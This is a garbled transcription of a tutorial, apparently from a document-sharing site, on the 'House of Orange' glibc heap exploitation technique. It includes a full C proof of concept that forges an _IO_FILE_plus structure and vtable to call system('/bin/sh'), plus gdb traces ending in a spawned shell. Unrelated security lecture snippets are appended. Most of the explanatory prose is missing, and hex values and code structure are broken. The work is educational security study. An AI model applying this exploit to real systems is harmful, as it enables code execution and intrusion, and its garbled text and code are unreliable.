Excuse the ads! We need some help to keep our site up.
|
|
- Tyrone Casey
- 5 years ago
- Views:
Transcription
1 House of Orange Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 3 Explanation of vulnerability 3.1 Add Free chunk to Unsorted bin 3.2 Unsorted bin attack 3.3 Call _IO_flush_all_lockp() 3.4 _IO_flush_all_lockp() 3.5 Struct _IO_FILE_plus struct _IO_FILE struct _IO_jump_t 3.6 struct _IO_wide_data *_wide_data 4 Example 4.1 Files 4.2 Source code 4.3 Exploit flow 4.4 Debugging 5 Related information Conditions. Top chunk. Top chunk. Top chunk Free chunk. Free chunk. Exploit plan. Add Free chunk to Unsorted bin 1 Heap. Top chunk. Top chunk + size. Top chunk prev_inuse. Ex) Top chunk : 0x20c01, Overwrite to value : 0xc00 + 0x1 = 0xc01 Top chunk Heap. Malloc sysmalloc. sysmalloc() _int_free() "Top chunk - 0x8" Unsorted bin. "Top chunk" Free chunk. Write to " Fake struct _IO_FILE_plus", " Fake struct _IO_wide_data" Free chunk " Fake struct _IO_FILE_plus", "Fake struct _IO_wide_data". Fake "struct _IO_FILE_plus" _mode = '0' vtable = "Fake vtable address" _wide_data = "Fake struct _IO_wide_data" Fake "struct _IO_wide_data" Fake "struct _IO_FILE_plus".
2 _IO_flush_all_lockp() "fp" "_freeres_list", "_freeres_buf". fp_wide_data fp_offset. fp _freeres_list = _wide_data->_io_write_ptr fp_freeres_buf = _wide_data->_io_write_base Unsorted bin attack Free chunk bk "&_IO_list_all - 0x16". Free chunk smallbin[4] Free chunk size. : 90 ~ 98 Heap. House of orange(?) _int_malloc() "_IO_list_all" "main_arena.top". _int_malloc() smallbin[4] Free chunk. _int_malloc() _IO_flush_all_lockp(). _IO_flush_all_lockp() "_IO_list_all" (main_arena). _IO_flush_all_lockp() "fp = fp_chain" fp. fp "Fake struct _IO_FILE_plus". _IO_flush_all_lockp() fp _IO_OVERFLOW. _IO_list_all->vtable->_IO_overflow_t _IO_OVERFLOW : fp + 0x60(vtable) + 0x18(_IO_overflow_t) = Explanation of vulnerability Add Free chunk to Unsorted bin sysmalloc() _int_free() Unsorted bin free chunk. Top chunk Heap, _int_malloc() sysmalloc() Heap. sysmalloc() _int_free(). Top chunk + size. Top chunk prev_inuse. malloc.c /* If not the first time through, we require old_size to be at least MINSIZE and to have prev_inuse set. */ assert ((old_top == initial_top (av) && old_size == 0) ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top) && ((unsigned long) old_end & (pagesize - 1)) == 0)); /* Precondition: not enough current space to satisfy nb request */ assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE)); Unsorted bin attack unsorted bin attack Call _IO_flush_all_lockp() glibc _int_malloc(). _int_malloc() malloc_printerr() libc_message FI_abort() _IO_flush_all_lockp() "House of Orange" _IO_flush_all_lockp().
3 malloc_printerr(). malloc.c for (;; ) int iters = 0; while ((victim = unsorted_chunks (av)->bk)!= unsorted_chunks (av)) bck = victim->bk; if ( builtin_expect (victim->size <= 2 * SIZE_SZ, 0) builtin_expect (victim->size > av->system_mem, 0)) malloc_printerr (check_action, "malloc(): memory corruption", chunk2mem (victim), av); size = chunksize (victim); _IO_flush_all_lockp(). line 792 : "_IO_OVERFLOW()" system(). line 788, 789 : "_IO_OVERFLOW()". line 806 : "fp" Fake "_IO_FILE_plus". "fp". Top chunk Unsorted bin attack "_IO_list_all", main_arena., "fp" main_arena, " fp = fp_chain" Fake "_IO_FILE_plus". _IO_flush_all_lockp() "fp" _IO_OVERFLOW(). int _IO_flush_all_lockp (int do_lock) int result = 0; struct _IO_FILE *fp; int last_stamp; genops.c #ifdef _IO_MTSAFE_IO libc_cleanup_region_start (do_lock, flush_cleanup, NULL); if (do_lock) _IO_lock_lock (list_all_lock); #endif last_stamp = _IO_list_all_stamp; fp = (_IO_FILE *) _IO_list_all; while (fp!= NULL) run_fp = fp; if (do_lock) _IO_flockfile (fp); if (((fp->_mode <= 0 && fp->_io_write_ptr > fp->_io_write_base) #if defined _LIBC defined _GLIBCPP_USE_WCHAR_T (_IO_vtable_offset (fp) == 0
4 #endif && fp->_mode > 0 && (fp->_wide_data->_io_write_ptr > fp->_wide_data->_io_write_base)) ) && _IO_OVERFLOW (fp, EOF) == EOF) result = EOF; if (do_lock) _IO_funlockfile (fp); run_fp = NULL; } if (last_stamp!= _IO_list_all_stamp) /* Something was added to the list. Start all over again. */ fp = (_IO_FILE *) _IO_list_all; last_stamp = _IO_list_all_stamp; } else fp = fp->_chain; #ifdef _IO_MTSAFE_IO if (do_lock) _IO_lock_unlock (list_all_lock); libc_cleanup_region_end (0); #endif } return result; Struct _IO_FILE_plus "_IO_list_all" "_IO_FILE_plus". "_IO_FILE_plus". _IO_FILE _IO_jump_t libiop.h extern struct _IO_FILE_plus *_IO_list_all; struct _IO_FILE_plus _IO_FILE file; const struct _IO_jump_t *vtable; }; libiop.h
5 struct _IO_FILE libio.h - struct _IO_FILE struct _IO_FILE int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ streambuf protocol. */ /* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */ char* _IO_read_ptr; /* Current read pointer */ char* _IO_read_end; /* End of get area. */ char* _IO_read_base; /* Start of putback+get area. */ char* _IO_write_base; /* Start of put area. */ char* _IO_write_ptr; /* Current put pointer. */ char* _IO_write_end; /* End of put area. */ char* _IO_buf_base; /* Start of reserve area. */ char* _IO_buf_end; /* End of reserve area. */ /* The following fields are used to support backing up and undo. */ char *_IO_save_base; /* Pointer to start of non-current get area. */ char *_IO_backup_base; /* Pointer to first valid character of backup area */ char *_IO_save_end; /* Pointer to end of non-current get area. */ struct _IO_marker *_markers; struct _IO_FILE *_chain; int _fileno; #if 0 int _blksize; #else int _flags2; #endif _IO_off_t _old_offset; /* This used to be _offset but it's too small. */ #define HAVE_COLUMN /* temporary */ /* 1+column number of pbase(); 0 is unknown. */ unsigned short _cur_column; signed char _vtable_offset; char _shortbuf[1]; /* char* _save_gptr; char* _save_egptr; */ _IO_lock_t *_lock; #ifdef _IO_USE_OLD_IO_FILE }; struct _IO_jump_t.
6 _IO_overflow_t _IO_OVERFLOW(). libiop.h - struct _IO_jump_t struct _IO_jump_t JUMP_FIELD(size_t, dummy); JUMP_FIELD(size_t, dummy2); JUMP_FIELD(_IO_finish_t, finish); JUMP_FIELD(_IO_overflow_t, overflow); JUMP_FIELD(_IO_underflow_t, underflow); JUMP_FIELD(_IO_underflow_t, uflow); JUMP_FIELD(_IO_pbackfail_t, pbackfail); /* showmany */ JUMP_FIELD(_IO_xsputn_t, xsputn); JUMP_FIELD(_IO_xsgetn_t, xsgetn); JUMP_FIELD(_IO_seekoff_t, seekoff); JUMP_FIELD(_IO_seekpos_t, seekpos); JUMP_FIELD(_IO_setbuf_t, setbuf); JUMP_FIELD(_IO_sync_t, sync); JUMP_FIELD(_IO_doallocate_t, doallocate); JUMP_FIELD(_IO_read_t, read); JUMP_FIELD(_IO_write_t, write); JUMP_FIELD(_IO_seek_t, seek); JUMP_FIELD(_IO_close_t, close); JUMP_FIELD(_IO_stat_t, stat); JUMP_FIELD(_IO_showmanyc_t, showmanyc); JUMP_FIELD(_IO_imbue_t, imbue); #if 0 get_column; set_column; #endif }; struct _IO_wide_data *_wide_data. _wide_data. genops.c #if defined _LIBC defined _GLIBCPP_USE_WCHAR_T (_IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_io_write_ptr > fp->_wide_data->_io_write_base)) #endif struct _IO_wide_data *_wide_data libio.h
7 libio.h /* Extra data for wide character streams. */ struct _IO_wide_data wchar_t *_IO_read_ptr; /* Current read pointer */ wchar_t *_IO_read_end; /* End of get area. */ wchar_t *_IO_read_base; /* Start of putback+get area. */ wchar_t *_IO_write_base; /* Start of put area. */ wchar_t *_IO_write_ptr; /* Current put pointer. */ wchar_t *_IO_write_end; /* End of put area. */ wchar_t *_IO_buf_base; /* Start of reserve area. */ wchar_t *_IO_buf_end; /* End of reserve area. */ /* The following fields are used to support backing up and undo. */ wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */ wchar_t *_IO_backup_base; /* Pointer to first valid character of backup area */ wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */ mbstate_t _IO_state; mbstate_t _IO_last_state; struct _IO_codecvt _codecvt; wchar_t _shortbuf[1]; const struct _IO_jump_t *_wide_vtable; }; Example Files Source code
8 #include <stdio.h> #include <stdlib.h> #include <string.h> int winner ( char *ptr); int main() char *p1, *p2; size_t io_list_all, *top; p1 = malloc(0x400-16); top = (size_t *) ( (char *) p1 + 0x400-16); top[1] = 0xc01; p2 = malloc(0x1000); io_list_all = top[2] + 0x9a8; top[3] = io_list_all - 0x10; memcpy( ( char *) top, "/bin/sh\x00", 8); top[1] = 0x61; top[24] = 1; top[21] = 2; top[22] = 3; top[20] = (size_t) &top[18]; top[15] = (size_t) &winner; top[27] = (size_t ) &top[12]; malloc(10); } return 0; int winner(char *ptr) system(ptr); return 0; } Exploit flow
9 House of Orange Debugging Break point. 0x4005e3 : malloc() 0x40060e : malloc() 0x4006d9 : malloc() gdb-peda$ b *0x4005e3 Breakpoint 1 at 0x4005e3 gdb-peda$ b *0x40060e Breakpoint 2 at 0x40060e gdb-peda$ b *0x4006d9 Breakpoint 3 at 0x4006d9 Break points Heap Top chunk. Top chunk : 0x20c01
10 malloc(0x3f0) gdb-peda$ r Starting program: /home/lazenca0x0/documents/definition/heap/houseoforange /orange Breakpoint 1, 0x e3 in main () gdb-peda$ ni 0x e8 in main () gdb-peda$ i r rax rax 0x x gdb-peda$ x/2gx 0x x10 0x602000: 0x x gdb-peda$ x/2gx 0x x400 0x602400: 0x x c01 gdb-peda$ Top chunk Top chunk(0x602400) unsorted bin. main_arena. top 0x x unsorted bin[0] 0x7ffff7dd1b78 0x unsorted bin[1] 0x7ffff7dd1b78 0x Top chunk(0x602400) free chunk.
11 gdb-peda$ c Continuing. Overwrite a 0xc01 on Top Chunk and malloc(0x1000) Breakpoint 2, 0x e in main () gdb-peda$ x/2gx 0x x400 0x602400: 0x x c01 gdb-peda$ p main_arena.top $1 = (mchunkptr) 0x gdb-peda$ p main_arena.bins[0] $2 = (mchunkptr) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ p main_arena.bins[1] $3 = (mchunkptr) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ ni 0x in main () gdb-peda$ x/2gx 0x x400 0x602400: 0x x be1 gdb-peda$ p main_arena.top $4 = (mchunkptr) 0x gdb-peda$ p main_arena.bins[0] $5 = (mchunkptr) 0x gdb-peda$ p main_arena.bins[1] $6 = (mchunkptr) 0x gdb-peda$ free chunk Fake "struct _IO_wide_data", "struct _IO_FILE_plus". free chunk bk _IO_list_all main_arena. _IO_list_all : 0x7ffff7dd2540 <_IO_2_1_stderr_> free chunk size smallbin[4]. smallbin[4] heap : 90 ~ 98 _IO_FILE_plus() "_IO_flush_all_lockp+0" Break point.
12 Write to Fake fp and Malloc(10) gdb-peda$ c Continuing. Breakpoint 3, 0x d9 in main () gdb-peda$ x/30gx 0x x602400: 0x f6e69622f 0x x602410: 0x00007ffff7dd1b78 0x00007ffff7dd2510 0x602420: 0x x x602430: 0x x x602440: 0x x x602450: 0x x x602460: 0x x x602470: 0x x e5 0x602480: 0x x x602490: 0x x x6024a0: 0x x x6024b0: 0x x x6024c0: 0x x x6024d0: 0x x x6024e0: 0x x gdb-peda$ p _IO_list_all $8 = (struct _IO_FILE_plus *) 0x7ffff7dd2540 <_IO_2_1_stderr_> gdb-peda$ disassemble _IO_flush_all_lockp Dump of assembler code for function _IO_flush_all_lockp: 0x00007ffff7a89020 <+0>: push r15... End of assembler dump. gdb-peda$ b *0x00007ffff7a89020 Breakpoint 4 at 0x7ffff7a89020: file genops.c, line 760. gdb-peda$ _int_malloc() 0x smallbin[4]. "fp_chain" 0x "fp = fp_chain" "*_IO_flush_all_lockp+490" Break point. _int_free() gdb-peda$ c Continuing. *** Error in `/home/lazenca0x0/documents/definition/heap/houseoforange /orange1': malloc(): memory corruption: 0x00007ffff7dd2520 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff7a847e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7ffff7a8f13e] /lib/x86_64-linux-gnu/libc.so.6( libc_malloc+0x54)[0x7ffff7a91184] /home/lazenca0x0/documents/definition/heap/houseoforange/orange1[0x4006de] /lib/x86_64-linux-gnu/libc.so.6( libc_start_main+0xf0)[0x7ffff7a2d830] /home/lazenca0x0/documents/definition/heap/houseoforange/orange1[0x400509] ======= Memory map: ======== r-xp : /home/lazenca0x0/documents/definition/heap/houseoforange/orange1
13 r--p : /home/lazenca0x0/documents/definition/heap/houseoforange/orange rw-p : /home/lazenca0x0/documents/definition/heap/houseoforange/orange rw-p :00 0 [heap] 7ffff ffff rw-p :00 0 7ffff ffff p :00 0 7ffff77f7000-7ffff780d000 r-xp : /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff780d000-7ffff7a0c p : /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff7a0c000-7ffff7a0d000 rw-p : /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff7a0d000-7ffff7bcd000 r-xp : /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7bcd000-7ffff7dcd p 001c : /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dcd000-7ffff7dd1000 r--p 001c : /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd1000-7ffff7dd3000 rw-p 001c : /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p :00 0 7ffff7dd7000-7ffff7dfd000 r-xp : /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fd5000-7ffff7fd8000 rw-p :00 0 7ffff7ff5000-7ffff7ff8000 rw-p :00 0 7ffff7ff8000-7ffff7ffa000 r--p :00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp :00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p : /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p : /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p :00 0 7ffffffde000-7ffffffff000 rw-p :00 0 [stack] ffffffffff ffffffffff r-xp :00 0 [vsyscall] Breakpoint 4, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c: genops.c: No such file or directory. gdb-peda$ p _IO_list_all $9 = (struct _IO_FILE_plus *) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ p main_arena.bins[10] $10 = (mchunkptr) 0x gdb-peda$ p main_arena.bins[11] $11 = (mchunkptr) 0x gdb-peda$ b *_IO_flush_all_lockp+490 Breakpoint 5 at 0x7ffff7a8920a: file genops.c, line 800. gdb-peda$
14 "fp = fp_chain" smallbin[4](0x602400) "fp". 0x7ffff7dd1b78 + 0x68 = 0x7ffff7dd1be00x gdb-peda$ c Continuing. fp = fp->_chain; Breakpoint 5, _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c: in genops.c gdb-peda$ x/i _IO_flush_all_lockp+490 => 0x7ffff7a8920a <_IO_flush_all_lockp+490>: mov rbx,qword PTR [rbx+0x68] gdb-peda$ p fp $14 = (struct _IO_FILE *) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ i r rbx rbx 0x7ffff7dd1b78 0x7ffff7dd1b78 gdb-peda$ ni 773 in genops.c gdb-peda$ p fp $15 = (struct _IO_FILE *) 0x gdb-peda$ i r rbx rbx 0x x gdb-peda$ b *_IO_flush_all_lockp+356 Breakpoint 6 at 0x7ffff7a89184: file genops.c, line 786. gdb-peda$ "fp" vtable. vtable address : 0x xd8 = 0x6024d8 0x _IO_overflow_t : 0x x18 = 0x x4006e5
15 gdb-peda$ c Continuing. _IO_OVERFLOW Breakpoint 6, 0x7ffff7a89184 in _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c: in genops.c gdb-peda$ x/4i 0x7ffff7a89184 => 0x7ffff7a89184 <_IO_flush_all_lockp+356>: mov rax,qword PTR [rbx+0xd8] 0x7ffff7a8918b <_IO_flush_all_lockp+363>: mov esi,0xffffffff 0x7ffff7a89190 <_IO_flush_all_lockp+368>: mov rdi,rbx 0x7ffff7a89193 <_IO_flush_all_lockp+371>: call QWORD PTR [rax+0x18] gdb-peda$ i r rbx rbx 0x x gdb-peda$ x/gx 0x xd8 0x6024d8: 0x gdb-peda$ x/s 0x x602400: "/bin/sh" gdb-peda$ x/gx 0x x18 0x602478: 0x e5 gdb-peda$ x/i 0x4006e5 0x4006e5 <winner>: push rbp gdb-peda$ "/bin/bash".
16 gdb-peda$ c Continuing. call the _IO_OVERFLOW Breakpoint 8, 0x00007ffff7a89193 in _IO_flush_all_lockp (do_lock=do_lock@entry=0x0) at genops.c: in genops.c gdb-peda$ ni [New process 48247] process is executing new program: /bin/dash Error in re-setting breakpoint 5: No symbol table is loaded. Use the "file" command. Error in re-setting breakpoint 6: No symbol table is loaded. Use the "file" command. Error in re-setting breakpoint 7: No symbol table is loaded. Use the "file" command. Warning: Cannot insert breakpoint 1. Cannot access memory at address 0x4005e3 Cannot insert breakpoint 2. Cannot access memory at address 0x40060e Cannot insert breakpoint 3. Cannot access memory at address 0x4006d9 Cannot insert breakpoint 4. Cannot access memory at address 0x7ffff7a89020 Cannot insert breakpoint 8. Cannot access memory at address 0x7ffff7a89193 gdb-peda$ Error Shell. Get shell! lazenca0x0@ubuntu:~/documents/definition/heap/houseoforange$./orange1 *** Error in `./orange1': malloc(): memory corruption: 0x00007fa48f8c8520 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fa48f57a7e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7fa48f58513e] /lib/x86_64-linux-gnu/libc.so.6( libc_malloc+0x54)[0x7fa48f587184]./orange1[0x4006de] /lib/x86_64-linux-gnu/libc.so.6( libc_start_main+0xf0)[0x7fa48f523830]./orange1[0x400509] ======= Memory map: ======== r-xp : /home/lazenca0x0/documents/definition/heap/houseoforange/orange r--p : /home/lazenca0x0/documents/definition/heap/houseoforange/orange rw-p :
17 /home/lazenca0x0/documents/definition/heap/houseoforange/orange1 0211d rw-p :00 0 [heap] 7fa fa rw-p :00 0 7fa fa48c p :00 0 7fa48f2ed000-7fa48f r-xp : /lib/x86_64-linux-gnu/libgcc_s.so.1 7fa48f fa48f p : /lib/x86_64-linux-gnu/libgcc_s.so.1 7fa48f fa48f rw-p : /lib/x86_64-linux-gnu/libgcc_s.so.1 7fa48f fa48f6c3000 r-xp : /lib/x86_64-linux-gnu/libc-2.23.so 7fa48f6c3000-7fa48f8c p 001c : /lib/x86_64-linux-gnu/libc-2.23.so 7fa48f8c3000-7fa48f8c7000 r--p 001c : /lib/x86_64-linux-gnu/libc-2.23.so 7fa48f8c7000-7fa48f8c9000 rw-p 001c : /lib/x86_64-linux-gnu/libc-2.23.so 7fa48f8c9000-7fa48f8cd000 rw-p :00 0 7fa48f8cd000-7fa48f8f3000 r-xp : /lib/x86_64-linux-gnu/ld-2.23.so 7fa48facf000-7fa48fad2000 rw-p :00 0 7fa48faef000-7fa48faf2000 rw-p :00 0 7fa48faf2000-7fa48faf3000 r--p : /lib/x86_64-linux-gnu/ld-2.23.so 7fa48faf3000-7fa48faf4000 rw-p : /lib/x86_64-linux-gnu/ld-2.23.so 7fa48faf4000-7fa48faf5000 rw-p :00 0 7ffca3f1b000-7ffca3f3c000 rw-p :00 0 [stack] 7ffca3fd1000-7ffca3fd3000 r--p :00 0 [vvar] 7ffca3fd3000-7ffca3fd5000 r-xp :00 0 [vdso] ffffffffff ffffffffff r-xp :00 0 [vsyscall] $ ls hell orange1 orange1.c peda-session-dash.txt peda-session-orange1.txt peda-session-test.txt test $ id uid=1001(lazenca0x0) gid=1001(lazenca0x0) groups=1001(lazenca0x0) $ Related information
18
Day21 A. Young W. Lim Wed. Young W. Lim Day21 A Wed 1 / 13
Day21 A Young W. Lim 2017-12-06 Wed Young W. Lim Day21 A 2017-12-06 Wed 1 / 13 Outline 1 Based on 2 File Processing Files and Streams Young W. Lim Day21 A 2017-12-06 Wed 2 / 13 Based on "C How to Program",
More informationPlay with FILE Structure Yet Another Binary Exploitation Technique. Abstract
Play with FILE Structure Yet Another Binary Exploitation Technique An-Jie Yang (Angelboy) angelboy@chroot.org Abstract To fight against prevalent cyber threat, more mechanisms to protect operating systems
More information2
1 2 3 4 5 6 7 $ sed -n 22,27p glibc/malloc/malloc.c This is a version (aka ptmalloc2) of malloc/free/realloc written by Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger. There have been
More informationCMPSC 311- Introduction to Systems Programming Module: Input/Output
CMPSC 311- Introduction to Systems Programming Module: Input/Output Professor Patrick McDaniel Fall 2014 Input/Out Input/output is the process of moving bytes into and out of the process space. terminal/keyboard
More informationReturn Oriented Programming
ROP gadgets Small instruction sequence ending with a ret instruction 0xc3 Gadgets are found in existing, resident code and libraries There exist tools to search for and find gadgets Gadgets are put together
More informationInside ptmalloc2. Peng Xu Sep 14, 2013
Inside ptmalloc2 Peng Xu peng.p.xu@ericsson.com Sep 14, 2013 Part I basic concept and data structure Memory Translation process memory layout kernel space command line and environment variables stack heap
More informationCSE / / 60567: Computer Security. Software Security 4
CSE 40567 / 44567 / 60567: Computer Security Software Security 4 91 Homework #5 Due: Tonight at 11:59PM Eastern Time (ND) / Pacific Time (SV) See Assignments Page on the course website for details 92 Notes
More informationCSE 509: Computer Security
CSE 509: Computer Security Date: 2.16.2009 BUFFER OVERFLOWS: input data Server running a daemon Attacker Code The attacker sends data to the daemon process running at the server side and could thus trigger
More informationBuffer Overflow. An Introduction
Buffer Overflow An Introduction Workshop Flow-1 Revision (4-10) How a program runs Registers Memory Layout of a Process Layout of a StackFrame Layout of stack frame using GDB and looking at Assembly code
More informationmalloc() is often used to allocate chunk of memory dynamically from the heap region. Each chunk contains a header and free space (the buffer in which
Heap Overflow malloc() is often used to allocate chunk of memory dynamically from the heap region. Each chunk contains a header and free space (the buffer in which data are placed). The header contains
More informationDownload the tarball for this session. It will include the following files:
Getting Started 1 Download the tarball for this session. It will include the following files: driver driver.c bomb.h bomb.o 64-bit executable C driver source declaration for "bomb" 64-bit object code for
More informationCSC 405 Computer Security Stack Canaries & ASLR
CSC 405 Computer Security Stack Canaries & ASLR Alexandros Kapravelos akaprav@ncsu.edu How can we prevent a buffer overflow? Check bounds Programmer Language Stack canaries [...more ] Buffer overflow defenses
More informationLec07: Return-oriented programming. Taesoo Kim
1 Lec07: Return-oriented programming Taesoo Kim Scoreboard 2 3 Administrivia Please submit both working exploit and write-up on time! Due: Lab04 is due on Oct 11 Due: Lab05 is out and its due on Oct 18
More informationIntroduction to Computer Systems , fall th Lecture, Sep. 28 th
Introduction to Computer Systems 15 213, fall 2009 9 th Lecture, Sep. 28 th Instructors: Majd Sakr and Khaled Harras Last Time: Structures struct rec { int i; int a[3]; int *p; }; Memory Layout i a p 0
More informationDownload the tarball for this session. It will include the following files:
Getting Started 1 Download the tarball for this session. It will include the following files: driver driver.c bomb.h bomb.o 64-bit executable C driver source declaration for "bomb" 64-bit object code for
More informationLinux Kernel Compilation & Working of malloc() in Linux Operating Systems
1 Linux Kernel Compilation & Working of malloc() in Linux Operating Systems 2 Group Members Content & Index 1. Problem.4 2. Description...4 3. Implementation & Testing 9 4. Conclusion 39 5. Sources.40
More informationSecure Software Programming and Vulnerability Analysis
Secure Software Programming and Vulnerability Analysis Christopher Kruegel chris@auto.tuwien.ac.at http://www.auto.tuwien.ac.at/~chris Heap Buffer Overflows and Format String Vulnerabilities Secure Software
More informationA heap, a stack, a bottle and a rack. Johan Montelius HT2017
Introduction A heap, a stack, a bottle and a rack. Johan Montelius HT2017 In this assignment you re going to investigate the layout of a process; where are the different areas located and which data structures
More informationLab 7 Linux Debugging. EECS 448: Software Engineering I Mark Calnon October 17, 2011
Lab 7 Linux Debugging EECS 448: Software Engineering I Mark Calnon October 17, 2011 GDB Getting Started To start gdb from the command line, first browse to the directory containing the core dump to debug
More informationCSC 591 Systems Attacks and Defenses Return-into-libc & ROP
CSC 591 Systems Attacks and Defenses Return-into-libc & ROP Alexandros Kapravelos akaprav@ncsu.edu NOEXEC (W^X) 0xFFFFFF Stack Heap BSS Data 0x000000 Code RW RX Deployment Linux (via PaX patches) OpenBSD
More information==11348==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 0x7f440c6fa8c8 sp 0x7ffd88d08360 bp 0x7ffd88d08950 T0)
Example output: ASAN:SIGSEGV ================================================================= ==11348==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f440c6fa8c8 sp 0x7ffd88d08360
More information20: Exploits and Containment
20: Exploits and Containment Mark Handley Andrea Bittau What is an exploit? Programs contain bugs. These bugs could have security implications (vulnerabilities) An exploit is a tool which exploits a vulnerability
More informationLinux Memory Layout. Lecture 6B Machine-Level Programming V: Miscellaneous Topics. Linux Memory Allocation. Text & Stack Example. Topics.
Lecture 6B Machine-Level Programming V: Miscellaneous Topics Topics Linux Memory Layout Understanding Pointers Buffer Overflow Upper 2 hex digits of address Red Hat v. 6.2 ~1920MB memory limit FF C0 Used
More informationBiography. Background
From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ KTH, January 2019 1 / 28 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail: calle.svensson@zeta-two.com
More informationBuffer-Overflow Attacks on the Stack
Computer Systems Buffer-Overflow Attacks on the Stack Introduction A buffer overflow occurs when a program, while writing data to a buffer, overruns the buffer's boundary and overwrites memory in adjacent
More informationFrom Over ow to Shell
From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ Google, December 2018 1 / 25 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail:
More informationBuffer Overflow Attack
Buffer Overflow Attack What every applicant for the hacker should know about the foundation of buffer overflow attacks By (Dalgona@wowhacker.org) Email: zinwon@gmail.com 2005 9 5 Abstract Buffer overflow.
More informationA short session with gdb verifies a few facts; the student has made notes of some observations:
This assignment refers to concepts discussed in the course notes on gdb and the book The Art of Debugging by Matloff & Salzman. The questions are definitely "hands-on" and will require some reading beyond
More informationBuffer-Overflow Attacks on the Stack
Computer Systems Buffer-Overflow Attacks on the Stack Introduction A buffer overflow occurs when a program, while writing data to a buffer, overruns the buffer's boundary and overwrites memory in adjacent
More informationLecture 08 Control-flow Hijacking Defenses
Lecture 08 Control-flow Hijacking Defenses Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Slides adapted from Miller, Bailey, and Brumley Control Flow Hijack: Always control + computation
More informationFastbin_dup into stack exploitation
Fastbin_dup into stack exploitation This tutorial is about the fastbin_dup into stack heap exploitation. First we re going to analyze what is fastbin and how to exploit the heap by double freeing and reallocating
More informationProject 1 Notes and Demo
Project 1 Notes and Demo Overview You ll be given the source code for 7 short buggy programs (target[1-7].c). These programs will be installed with setuid root Your job is to write exploits (sploit[1-7].c)
More informationlast time Assembly part 2 / C part 1 condition codes reminder: quiz
last time Assembly part 2 / C part 1 linking extras: different kinds of relocations addresses versus offset to addresses dynamic linking (briefly) AT&T syntax destination last O(B, I, S) B + I S + O jmp
More informationCNIT 127: Exploit Development. Ch 2: Stack Overflows in Linux
CNIT 127: Exploit Development Ch 2: Stack Overflows in Linux Stack-based Buffer Overflows Most popular and best understood exploitation method Aleph One's "Smashing the Stack for Fun and Profit" (1996)
More informationHeap Off by 1 Overflow Illustrated. Eric Conrad October 2007
Heap Off by 1 Overflow Illustrated Eric Conrad October 2007 1 The Attack Older CVS versions are vulnerable to an Off by 1 attack, where an attacker may insert one additional character into the heap CVS
More information==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x08 of 0x12. --=[ Disclaimer ]= //
==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x08 of 0x12 --=[ Disclaimer ]=-----------------------------------------------------// In this issue of Phrack, there are two similar articles about malloc
More informationCNIT 127: Exploit Development. Ch 3: Shellcode. Updated
CNIT 127: Exploit Development Ch 3: Shellcode Updated 1-30-17 Topics Protection rings Syscalls Shellcode nasm Assembler ld GNU Linker objdump to see contents of object files strace System Call Tracer Removing
More informationBinghamton University. CS-220 Spring X86 Debug. Computer Systems Section 3.11
X86 Debug Computer Systems Section 3.11 GDB is a Source Level debugger We have learned how to debug at the C level But the machine is executing X86 object code! How does GDB play the shell game? Makes
More informationSecure Coding in C and C++ Dynamic Memory Management Lecture 5 Jan 29, 2013
Secure Coding in C and C++ Dynamic Memory Management Lecture 5 Jan 29, 2013 Acknowledgement: These slides are based on author Seacord s original presentation Issues Dynamic Memory Management Common Dynamic
More informationDHCP is hard. Felix Wilhelm HITB Dubai 2018
DHCP is hard. Felix Wilhelm HITB Dubai 2018 A story of 5 bugs Intro Dynamic Host Configuration Protocol (DHCP) is a 25 year old protocol designed to dynamically assign an IP address and other related config
More informationbuffer overflow exploitation
buffer overflow exploitation Samuele Andreoli, Nicolò Fornari, Giuseppe Vitto May 11, 2016 University of Trento Introduction 1 introduction A Buffer Overflow is an anomaly where a program, while writing
More informationidkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com idkwim.linknow.
idkwim@gmail.com idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com choicy90@nate.com (Nate-On) @idkwim idkwim.linknow.kr Zombie PC?? -> No! Return Oriented Programming
More informationWhen you add a number to a pointer, that number is added, but first it is multiplied by the sizeof the type the pointer points to.
